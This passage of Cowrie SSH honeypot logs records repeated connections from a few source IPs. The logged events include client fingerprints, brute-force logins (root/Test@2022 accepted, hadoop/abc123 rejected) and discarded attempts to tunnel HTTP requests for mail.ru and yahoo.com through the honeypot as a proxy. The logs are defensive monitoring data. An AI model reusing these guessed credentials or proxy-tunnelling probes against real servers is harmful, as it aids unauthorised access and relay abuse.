.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:47:11.194710Z","src_ip":"77.83.207.83","session":"830a666021f4"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:47:11.445947Z","src_ip":"77.83.207.83","session":"830a666021f4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":13499,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:13499","sensor":"my-vps","timestamp":"2025-08-31T03:47:11.497503Z","session":"830a666021f4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:11.547846Z","src_ip":"77.83.207.83","session":"830a666021f4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":26865,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:26865","sensor":"my-vps","timestamp":"2025-08-31T03:47:11.689022Z","session":"830a666021f4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:11.739632Z","src_ip":"77.83.207.83","session":"830a666021f4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":9522,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:9522","sensor":"my-vps","timestamp":"2025-08-31T03:47:11.880762Z","session":"830a666021f4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:11.931211Z","src_ip":"77.83.207.83","session":"830a666021f4"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:11.982649Z","src_ip":"77.83.207.83","session":"830a666021f4"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":59804,"dst_ip":"1.2.3.4","dst_port":22,"session":"8ed8c22e5410","protocol":"ssh","message":"New connection: 77.83.207.83:59804 (1.2.3.4:22) [session: 8ed8c22e5410]","sensor":"my-vps","timestamp":"2025-08-31T03:47:12.032122Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:12.042297Z","src_ip":"77.83.207.83","session":"8ed8c22e5410"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:47:12.083287Z","src_ip":"77.83.207.83","session":"8ed8c22e5410"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"abc123","message":"login attempt [hadoop/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:47:12.112180Z","src_ip":"212.227.125.160","session":"9cd75c68e391"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:47:12.334950Z","src_ip":"77.83.207.83","session":"8ed8c22e5410"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":17652,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:17652","sensor":"my-vps","timestamp":"2025-08-31T03:47:12.386323Z","session":"8ed8c22e5410"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:12.436926Z","src_ip":"77.83.207.83","session":"8ed8c22e5410"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":7369,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:7369","sensor":"my-vps","timestamp":"2025-08-31T03:47:12.580934Z","session":"8ed8c22e5410"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:12.632170Z","src_ip":"77.83.207.83","session":"8ed8c22e5410"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":19893,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:19893","sensor":"my-vps","timestamp":"2025-08-31T03:47:12.776885Z","session":"8ed8c22e5410"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:12.827629Z","src_ip":"77.83.207.83","session":"8ed8c22e5410"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:12.878989Z","src_ip":"77.83.207.83","session":"8ed8c22e5410"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":59888,"dst_ip":"1.2.3.4","dst_port":22,"session":"59342ad869fe","protocol":"ssh","message":"New connection: 77.83.207.83:59888 (1.2.3.4:22) [session: 59342ad869fe]","sensor":"my-vps","timestamp":"2025-08-31T03:47:12.927941Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:12.938814Z","src_ip":"77.83.207.83","session":"59342ad869fe"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:47:12.978241Z","src_ip":"77.83.207.83","session":"59342ad869fe"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:47:13.228159Z","src_ip":"77.83.207.83","session":"59342ad869fe"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":2168,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:2168","sensor":"my-vps","timestamp":"2025-08-31T03:47:13.279154Z","session":"59342ad869fe"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:13.329332Z","src_ip":"77.83.207.83","session":"59342ad869fe"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":26627,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:26627","sensor":"my-vps","timestamp":"2025-08-31T03:47:13.484545Z","session":"59342ad869fe"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:13.535019Z","src_ip":"77.83.207.83","session":"59342ad869fe"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":1196,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:1196","sensor":"my-vps","timestamp":"2025-08-31T03:47:13.676553Z","session":"59342ad869fe"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:13.714493Z","src_ip":"212.227.125.160","session":"9cd75c68e391"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:13.726641Z","src_ip":"77.83.207.83","session":"59342ad869fe"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:13.777402Z","src_ip":"77.83.207.83","session":"59342ad869fe"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":59995,"dst_ip":"1.2.3.4","dst_port":22,"session":"e4431116eeee","protocol":"ssh","message":"New connection: 77.83.207.83:59995 (1.2.3.4:22) [session: e4431116eeee]","sensor":"my-vps","timestamp":"2025-08-31T03:47:13.825976Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:13.826950Z","src_ip":"77.83.207.83","session":"e4431116eeee"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:47:13.877299Z","src_ip":"77.83.207.83","session":"e4431116eeee"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:47:14.127862Z","src_ip":"77.83.207.83","session":"e4431116eeee"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":11735,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:11735","sensor":"my-vps","timestamp":"2025-08-31T03:47:14.178998Z","session":"e4431116eeee"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:14.229419Z","src_ip":"77.83.207.83","session":"e4431116eeee"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":26172,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:26172","sensor":"my-vps","timestamp":"2025-08-31T03:47:14.372646Z","session":"e4431116eeee"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:14.422842Z","src_ip":"77.83.207.83","session":"e4431116eeee"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":24293,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:24293","sensor":"my-vps","timestamp":"2025-08-31T03:47:14.564628Z","session":"e4431116eeee"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:14.614805Z","src_ip":"77.83.207.83","session":"e4431116eeee"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:14.665577Z","src_ip":"77.83.207.83","session":"e4431116eeee"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":60073,"dst_ip":"1.2.3.4","dst_port":22,"session":"c437c5fed83e","protocol":"ssh","message":"New connection: 77.83.207.83:60073 (1.2.3.4:22) [session: c437c5fed83e]","sensor":"my-vps","timestamp":"2025-08-31T03:47:14.716595Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:14.717192Z","src_ip":"77.83.207.83","session":"c437c5fed83e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:47:14.769423Z","src_ip":"77.83.207.83","session":"c437c5fed83e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:47:15.028116Z","src_ip":"77.83.207.83","session":"c437c5fed83e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":20382,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:20382","sensor":"my-vps","timestamp":"2025-08-31T03:47:15.080814Z","session":"c437c5fed83e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:15.132699Z","src_ip":"77.83.207.83","session":"c437c5fed83e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":16241,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:16241","sensor":"my-vps","timestamp":"2025-08-31T03:47:15.278317Z","session":"c437c5fed83e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:15.330348Z","src_ip":"77.83.207.83","session":"c437c5fed83e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":9819,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:9819","sensor":"my-vps","timestamp":"2025-08-31T03:47:15.474284Z","session":"c437c5fed83e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:15.526550Z","src_ip":"77.83.207.83","session":"c437c5fed83e"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:15.579387Z","src_ip":"77.83.207.83","session":"c437c5fed83e"}
